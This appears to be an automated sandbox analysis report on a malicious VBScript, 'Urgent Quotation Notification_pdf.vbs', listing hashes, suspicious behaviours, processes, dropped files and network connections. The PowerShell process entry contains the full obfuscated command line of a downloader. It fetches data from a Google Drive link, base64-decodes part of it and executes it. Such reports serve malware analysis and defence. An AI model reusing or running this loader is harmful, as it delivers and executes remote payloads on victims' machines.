| File name: | Urgent Quotation Notification_pdf.vbs |
| Full analysis: | https://app.any.run/tasks/bb1c509c-3535-489f-b547-86bac9f3cea9 |
| Verdict: | Malicious activity |
| Analysis date: | September 30, 2024, 08:09:59 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (2129), with CRLF line terminators |
| MD5: | 9399CD1DB4C7360B891ECC977DFBDC2A |
| SHA1: | 968F602ADCB6C30B6A6F3520BF90F17D9511E7C7 |
| SHA256: | EE0A0898DDB59AA40D7C429D982E56A1CA4847A2872B857A1A3934D316075576 |
| SSDEEP: | 384:5Ct1s/AY/KNCARVZLDLEYlXEEanhC4ZscgniCwyvN2vYiWdgPTwRUQBXANeu:8tiYY/KNCsZjELEOC4ZNPoggibPTwRUL |
MALICIOUS
No malicious indicators.SUSPICIOUS
Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)
- wscript.exe (PID: 7032)
Accesses system date via WMI (SCRIPT)
- wscript.exe (PID: 7032)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 7032)
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 7032)
Runs shell command (SCRIPT)
- wscript.exe (PID: 7032)
Accesses WMI object display name (SCRIPT)
- wscript.exe (PID: 7032)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 3396)
INFO
Disables trace logs
- powershell.exe (PID: 3396)
Checks proxy server information
- powershell.exe (PID: 3396)
Gets data length (POWERSHELL)
- powershell.exe (PID: 3396)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 3396)
Creates or changes the value of an item property via Powershell
- wscript.exe (PID: 7032)
The process uses the downloaded file
- wscript.exe (PID: 7032)
Reads the software policy settings
- slui.exe (PID: 2584)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 3396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
135
Monitored processes
6
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2208 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2584 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3396 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Actinal=3;$Actinal -lt $Brace66;$Actinal+=4){$stevedorerne+=$syngespil[$Actinal];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCIndeT.ar ottKomiC nf aiDraaa ob ckiAcilUnniTartUnfyske, no$RatP crrPraoOffsD etKvah anoKondBaaosprnstitOphi occ msAlt) ed ';$Prosthodontics=$Dutiable;Trolddomskunsternes (Fabrikskomplekserne 'Mil$Oveg BalHngoFotbPrma oL Pr:,acs stI .hdCouOundN snIMa a B sH,u= En( CotHjuesttsUnsTExi-KispRaaaCout skHRag Ebu$,omP ierK.io HusLant enHT kOTredD rO Brnsk,TAutIUn c PasHa,) Re ');while (!$sidonias) {Trolddomskunsternes (Fabrikskomplekserne ' K $Gafghkels ioPolbIntasinl.el:El U Dossvrl stiTign TigEtheMk,nUn s Kl=To $stot erM au sye Af ') ;Trolddomskunsternes $Bufferkapaciteterne;Trolddomskunsternes (Fabrikskomplekserne 'V lssoat MiaMatrBettf,j-WatsNislsike svePlepFas Epi4Chi ');Trolddomskunsternes (Fabrikskomplekserne 'F g$P.rgC llGaloHarb C.aItal Fo: G.sBloiHypd aso A,n,tai Nua OvsDem=Clu( ,rTD teAn seartFll-WogPId,aUndtn th su Ild$UnsPCl rBetosprsMyttslah o,oLordUbeoKupnGrotO eiKo cTrisG i)Kah ') ;Trolddomskunsternes (Fabrikskomplekserne 'squ$Audg EilB.aoBorbFesaIn lFac: coOs.rrAf tDewhP ro MacKape dsrE.ta FltKeliIsotErki llc ro= k$ U gse l s os jb osa llBow: UnU Kanra dWeaeBharslucTrarundoPlasVissZoni PsnMedgjus+Bi,+ Al% yp$B sP esrHareForiEvim ncpOpsostar Retdat.HvicDrno FiuI pnReotRec ') ;$Certifiability=$Preimport[$Orthoceratitic];}$Vejlenser=275493;$Cirkelines=30624;Trolddomskunsternes (Fabrikskomplekserne 'For$ FegtimlBraoKilbGolaOlalTo.:s nM ElaCorsHelsOveeWeitsm eOver PriFascpep Tra=Epi AnGRapesemtMus-HovCMauoho,nRevt steVinnAcatMel B r$tykPQu,r.haoBlusB at Rah CyoFlidsuioPron hltO,ei stc isLyk ');Trolddomskunsternes (Fabrikskomplekserne 'Ine$AlagGtel,enoHygb MraNeglClo:CanIdiansolfTr i PrnChaisrktUn.aBehtAfseP ad su l=N g ,jl[Be s,awyChisTuntsl,eNydm sp. ArCvero usnNonvFuteA.erAt tper]ski:Vej:TofFLetrKomoPremVarBEntaUdtsElseFes6 lu4 B sstitcsnrfugistrnsvegDri(Fra$UnsMKisaTassTo.sBraeWhatNyaes.orMusi ascVer) Bo ');Trolddomskunsternes (Fabrikskomplekserne ' dr$BefgsvilHeao ocb p.aBealZi :Un MR ko HyncesiUn s,ontPeli Fos R kOl e .v D g=dor Xip[UdhsV zyGuasB ktPhyeRapmObj.st TFo,e Rux tetGra. MoEMisn Glcstao ldD ni stnFusgbor]ent:kom: emAn nsBasCHe It aIGon. G,GItae sttAl,sburtJusr M.iUdsns mg e( As$ aIK in opfBini.efnsemiflet EfaUndt laesmud.in) Dr ');Trolddomskunsternes (Fabrikskomplekserne 'Brb$D,igB nlPreoHurb,oraRealUni: rTAngrTrao K,u Mev,oie rluPyrrGarsodi1 In5Me,6,ct=sol$AllMB yo O n I i.yrss otNseibagsAp.kopbeMoo. ndsAp usaubin sDiatVanr BoiHosnTe.gAfr(Cra$ProVsyne OdjKonlHjee.ilnDe sToge Norsat,afh$damC W iGe r Miksoge L lGauiBranjobeIn s as)Pen ');Trolddomskunsternes $Trouveurs156;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5644 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6388 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7032 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Urgent Quotation Notification_pdf.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
Total events
9 125
Read events
9 125
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
0
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3396 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hjzxkz2h.4ee.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3396 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_02xdd2qt.i2t.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
51
DNS requests
19
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
876 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6368 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6368 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
7140 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
876 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3260 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4176 | svchost.exe | 20.190.160.20:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4596 | svchost.exe | 23.35.238.131:443 | go.microsoft.com | AKAMAI-AS | DE | whitelisted |
3396 | powershell.exe | 142.250.185.110:443 | drive.google.com | GOOGLE | US | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
drive.google.com |
| shared |
drive.usercontent.google.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |